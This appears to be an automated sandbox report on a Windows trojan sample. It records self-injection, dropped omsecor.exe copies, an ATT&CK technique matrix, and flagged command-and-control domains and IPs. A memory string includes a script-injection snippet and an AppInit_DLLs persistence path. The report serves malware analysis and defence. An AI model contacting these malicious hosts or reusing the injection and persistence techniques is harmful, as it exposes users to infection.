            Source: C:\Windows\SysWOW64\omsecor.exeMemory written: C:\Windows\SysWOW64\omsecor.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeMemory written: C:\Users\user\AppData\Roaming\omsecor.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeMemory written: C:\Windows\SysWOW64\omsecor.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeMemory written: C:\Users\user\AppData\Roaming\omsecor.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeProcess created: C:\Users\user\Desktop\fmlgbgc2p5.exe C:\Users\user\Desktop\fmlgbgc2p5.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
            Source: omsecor.exeBinary or memory string: Shell_TrayWnd
            Source: fmlgbgc2p5.exe, 00000000.00000002.1641221794.000000000048D000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000000.00000002.1641457885.00000000020BB000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_0040327A cpuid 0_2_0040327A
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: GetLocaleInfoA,0_2_00406E83
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: GetLocaleInfoA,4_2_00406E83
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: GetLocaleInfoA,13_2_00406E83
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: GetLocaleInfoA,16_2_00406E83
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: GetLocaleInfoA,23_2_00406E83
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: GetLocaleInfoA,26_2_00406E83
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_00403196 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00403196
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,2_2_00407499
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_00406CB5 GetVersionExW,2_2_00406CB5
            Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            112
            Process Injection
            121
            Masquerading
            OS Credential Dumping2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts21
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            11
            Virtualization/Sandbox Evasion
            LSASS Memory131
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media2
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)112
            Process Injection
            Security Account Manager11
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture12
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
            Software Packing
            Cached Domain Credentials23
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569339 Sample: fmlgbgc2p5.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 57 ow5dirasuek.com 2->57 59 mkkuei4kdsz.com 2->59 61 lousta.net 2->61 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Antivirus detection for URL or domain 2->81 83 5 other signatures 2->83 15 fmlgbgc2p5.exe 2->15         started        signatures3 process4 signatures5 99 Detected unpacking (changes PE section rights) 15->99 101 Detected unpacking (overwrites its own PE header) 15->101 103 Found API chain indicative of debugger detection 15->103 105 Injects a PE file into a foreign processes 15->105 18 fmlgbgc2p5.exe 1 15->18         started        21 WerFault.exe 21 16 15->21         started        process6 file7 51 C:\Users\user\AppData\Roaming\omsecor.exe, MS-DOS 18->51 dropped 23 omsecor.exe 18->23         started        53 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->53 dropped process8 signatures9 85 Antivirus detection for dropped file 23->85 87 Detected unpacking (changes PE section rights) 23->87 89 Detected unpacking (overwrites its own PE header) 23->89 91 3 other signatures 23->91 26 omsecor.exe 13 23->26         started        30 WerFault.exe 19 16 23->30         started        process10 dnsIp11 63 mkkuei4kdsz.com 15.197.204.56, 49827, 49951, 80 TANDEMUS United States 26->63 65 lousta.net 193.166.255.171, 49708, 49771, 49844 FUNETASFI Finland 26->65 67 ow5dirasuek.com 52.34.198.229, 49833, 49955, 80 AMAZON-02US United States 26->67 55 C:\Windows\SysWOW64\omsecor.exe, MS-DOS 26->55 dropped 32 omsecor.exe 26->32         started        file12 process13 signatures14 69 Antivirus detection for dropped file 32->69 71 Detected unpacking (changes PE section rights) 32->71 73 Detected unpacking (overwrites its own PE header) 32->73 75 3 other signatures 32->75 35 omsecor.exe 32->35         started        37 WerFault.exe 20 16 32->37         started        process15 process16 39 omsecor.exe 35->39         started        signatures17 93 Injects a PE file into a foreign processes 39->93 42 omsecor.exe 12 39->42         started        44 WerFault.exe 16 39->44         started        process18 process19 46 omsecor.exe 42->46         started        signatures20 95 Drops executables to the windows directory (C:\Windows) and starts them 46->95 97 Injects a PE file into a foreign processes 46->97 49 omsecor.exe 46->49         started        process21

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            fmlgbgc2p5.exe89%ReversingLabsWin32.Trojan.VirtuMonde
            fmlgbgc2p5.exe100%AviraHEUR/AGEN.1352667
            fmlgbgc2p5.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Windows\SysWOW64\omsecor.exe100%AviraHEUR/AGEN.1352667
            C:\Users\user\AppData\Roaming\omsecor.exe100%AviraHEUR/AGEN.1352667
            C:\Windows\SysWOW64\omsecor.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\omsecor.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://mkkuei4kdsz.com/100%Avira URL Cloudphishing
            http://mkkuei4kdsz.com/441/819.html100%Avira URL Cloudphishing
            http://lousta.net/349/212.html100%Avira URL Cloudphishing
            http://lousta.net/100%Avira URL Cloudphishing
            http://lousta.net/952/351.htmlU?100%Avira URL Cloudphishing
            http://lousta.net/952/351.html_100%Avira URL Cloudphishing
            http://lousta.net/370/988.html100%Avira URL Cloudphishing
            http://lousta.net/952/351.htmlf?100%Avira URL Cloudphishing
            http://lousta.net/349/212.htmlD100%Avira URL Cloudphishing
            http://lousta.net/952/351.htmlx?3100%Avira URL Cloudphishing
            http://lousta.net/952/351.htmlshqos.dll.mui=100%Avira URL Cloudphishing
            http://ow5dirasuek.com/612/675.htmlc100%Avira URL Cloudphishing
            http://lousta.net/400/589.html100%Avira URL Cloudphishing
            http://ow5dirasuek.com/612/675.html100%Avira URL Cloudphishing
            http://mkkuei4kdsz.com/8100%Avira URL Cloudphishing
            http://ow5dirasuek.com/612/675.html%100%Avira URL Cloudphishing
            http://lousta.net/400/589.htmlx100%Avira URL Cloudphishing
            http://lousta.net/rontdesk100%Avira URL Cloudphishing
            http://lousta.net/206/582.html100%Avira URL Cloudphishing
            http://ow5dirasuek.com/358/336.html100%Avira URL Cloudphishing
            http://ow5dirasuek.com/~100%Avira URL Cloudphishing
            http://lousta.net/952/351.html6100%Avira URL Cloudphishing
            http://lousta.net/349/212.html5T100%Avira URL Cloudphishing
            http://lousta.net/952/351.htmlA100%Avira URL Cloudphishing
            http://lousta.net/952/351.html100%Avira URL Cloudphishing
            http://mkkuei4kdsz.com/931/166.html100%Avira URL Cloudphishing
            http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon100%Avira URL Cloudphishing
            http://ow5dirasuek.com/612/675.html-8a8d424fbe43573ef1LMEM100%Avira URL Cloudphishing
            http://lousta.net/370/988.html=100%Avira URL Cloudphishing
            http://lousta.net/206/582.htmlO2100%Avira URL Cloudphishing
            http://lousta.net/0100%Avira URL Cloudphishing
            http://lousta.net/349/212.html.T100%Avira URL Cloudphishing
            http://lousta.net/952/351.html)100%Avira URL Cloudphishing
            http://lousta.net/861/856.html100%Avira URL Cloudphishing
            http://ow5dirasuek.com/100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            lousta.net
            193.166.255.171
            truetrue
              unknown
              mkkuei4kdsz.com
              15.197.204.56
              truetrue
                unknown
                ow5dirasuek.com
                52.34.198.229
                truetrue
                  unknown
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://lousta.net/370/988.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://mkkuei4kdsz.com/true
                    • Avira URL Cloud: phishing
                    unknown
                    http://mkkuei4kdsz.com/441/819.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/349/212.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/true
                    • Avira URL Cloud: phishing
                    unknown
                    http://ow5dirasuek.com/612/675.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/400/589.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://ow5dirasuek.com/358/336.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/206/582.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://mkkuei4kdsz.com/931/166.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/952/351.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://ow5dirasuek.com/true
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/861/856.htmltrue
                    • Avira URL Cloud: phishing
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://lousta.net/952/351.htmlU?omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/952/351.html_omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/952/351.htmlx?3omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/952/351.htmlf?omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://lousta.net/349/212.htmlDomsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://upx.sf.netAmcache.hve.6.drfalse
                      high
                      http://lousta.net/952/351.htmlshqos.dll.mui=omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://mkkuei4kdsz.com/8omsecor.exe, 00000007.00000002.1840387008.0000000000622000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://ow5dirasuek.com/612/675.htmlcomsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/400/589.htmlxomsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://ow5dirasuek.com/612/675.html%omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/rontdeskomsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/952/351.htmlAomsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/349/212.html5Tomsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://ow5dirasuek.com/~omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconfmlgbgc2p5.exe, 00000000.00000002.1641221794.000000000048D000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000000.00000002.1641457885.00000000020BB000.00000004.00000020.00020000.00000000.sdmp, fmlgbgc2p5.exe, 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000004.00000002.1663858089.00000000020F9000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000004.00000002.1663673334.000000000054D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.1905585206.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.1905345423.000000000074D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000010.00000002.1905863705.0000000002026000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000010.00000002.1905714448.0000000000701000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 00000017.00000002.2376204202.0000000000531000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000017.00000002.2376628433.000000000206F000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, omsecor.exe, 0000001A.00000002.2374629905.00000000020B4000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001A.00000002.2374377981.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/952/351.html6omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://ow5dirasuek.com/612/675.html-8a8d424fbe43573ef1LMEMomsecor.exe, 00000007.00000002.1840387008.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/206/582.htmlO2omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/370/988.html=omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/0omsecor.exe, 0000001C.00000002.2589203177.0000000000194000.00000004.00000010.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://lousta.net/349/212.htmldomsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://lousta.net/349/212.html.Tomsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://lousta.net/952/351.html)omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        193.166.255.171
                        lousta.netFinland
                        1741FUNETASFItrue
                        52.34.198.229
                        ow5dirasuek.comUnited States
                        16509AMAZON-02UStrue
                        15.197.204.56
                        mkkuei4kdsz.comUnited States
                        7430TANDEMUStrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1569339
                        Start date and time:2024-12-05 18:08:14 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 11s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:32
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:fmlgbgc2p5.exe
                        renamed because original name is a hash value
                        Original Sample Name:8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72.exe
                        Detection:MAL
                        Classification:mal100.bank.troj.evad.winEXE@29/27@3/3
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 104
                        • Number of non-executed functions: 410
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.168.117.172
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus07.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: fmlgbgc2p5.exe
                        TimeTypeDescription
                        12:09:41API Interceptor9x Sleep call for process: omsecor.exe modified
                        12:09:48API Interceptor6x Sleep call for process: WerFault.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        193.166.255.171cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/352/26.html
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/691/461.html
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/562/252.html
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/989/145.html
                        Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                        • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                        Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                        • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                        document.log.scr.exeGet hashmaliciousUnknownBrowse
                        • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                        yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                        • www.synetik.net/
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/161/343.html
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/372/625.html
                        52.34.198.229cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • ow5dirasuek.com/618/507.html
                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ow5dirasuek.comcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        djvu452.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        mkkuei4kdsz.comcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        djvu452.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        lousta.netcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        djvu452.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        s-part-0035.t-0009.t-msedge.netQiGA4zxp7h.exeGet hashmaliciousFormBookBrowse
                        • 13.107.246.63
                        f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                        • 13.107.246.63
                        lj8shy7Er0.exeGet hashmaliciousGuLoaderBrowse
                        • 13.107.246.63
                        BUE1EnkN5v.exeGet hashmaliciousGuLoaderBrowse
                        • 13.107.246.63
                        http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                        • 13.107.246.63
                        8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                        • 13.107.246.63
                        https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                        • 13.107.246.63
                        MOV-0903787857-(Jmulvey)MMS0%3A28.mp4.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 13.107.246.63
                        http://womenluxuryfashion.comGet hashmaliciousTechSupportScamBrowse
                        • 13.107.246.63
                        O7T6gwPvqA.exeGet hashmaliciousScreenConnect ToolBrowse
                        • 13.107.246.63
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FUNETASFIcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 130.234.121.110
                        sora.ppc.elfGet hashmaliciousMiraiBrowse
                        • 86.50.103.12
                        ppc.elfGet hashmaliciousMiraiBrowse
                        • 153.1.142.240
                        loligang.mpsl-20241128-1536.elfGet hashmaliciousMiraiBrowse
                        • 192.98.111.96
                        x86.elfGet hashmaliciousMirai, MoobotBrowse
                        • 153.1.142.236
                        arm7.elfGet hashmaliciousUnknownBrowse
                        • 128.215.188.75
                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                        • 153.1.77.176
                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 128.214.247.115
                        x86.elfGet hashmaliciousUnknownBrowse
